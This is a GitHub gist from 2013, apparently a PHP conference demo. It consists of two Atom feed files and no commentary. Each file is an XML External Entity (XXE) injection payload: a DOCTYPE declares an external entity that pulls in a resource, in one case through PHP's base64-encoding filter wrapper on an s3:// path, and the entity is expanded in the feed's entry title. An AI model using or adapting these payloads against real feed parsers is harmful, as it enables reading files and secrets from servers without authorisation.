Created
September 13, 2013 14:27
-
-
Save co3k/6551460 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE feed [ | |
<!ENTITY kurorekishi SYSTEM "php://filter/convert.base64-encode/resource=s3://phpcon/ebihara-kaicho.jpg"> | |
]> | |
<feed xmlns="http://www.w3.org/2005/Atom"> | |
<title>example</title> | |
<updated>2013-06-24T11:56:27+09:00</updated> | |
<id>example</id> | |
<entry> | |
<title>&kurorekishi;</title> | |
<link href="http://example.com/" /> | |
<id>http://example.com/1</id> | |
<updated>2013-06-26T11:56:27+09:00</updated> | |
<summary>...</summary> | |
<author> | |
<name>example</name> | |
</author> | |
</entry> | |
</feed> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE feed [ | |
<!ENTITY kurorekishi SYSTEM "s3://phpcon/ebihara-kaicho.jpg"> | |
]> | |
<feed xmlns="http://www.w3.org/2005/Atom"> | |
<title>example</title> | |
<updated>2013-06-24T11:56:27+09:00</updated> | |
<id>example</id> | |
<entry> | |
<title>&kurorekishi;</title> | |
<link href="http://example.com/" /> | |
<id>http://example.com/1</id> | |
<updated>2013-06-26T11:56:27+09:00</updated> | |
<summary>...</summary> | |
<author> | |
<name>example</name> | |
</author> | |
</entry> | |
</feed> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment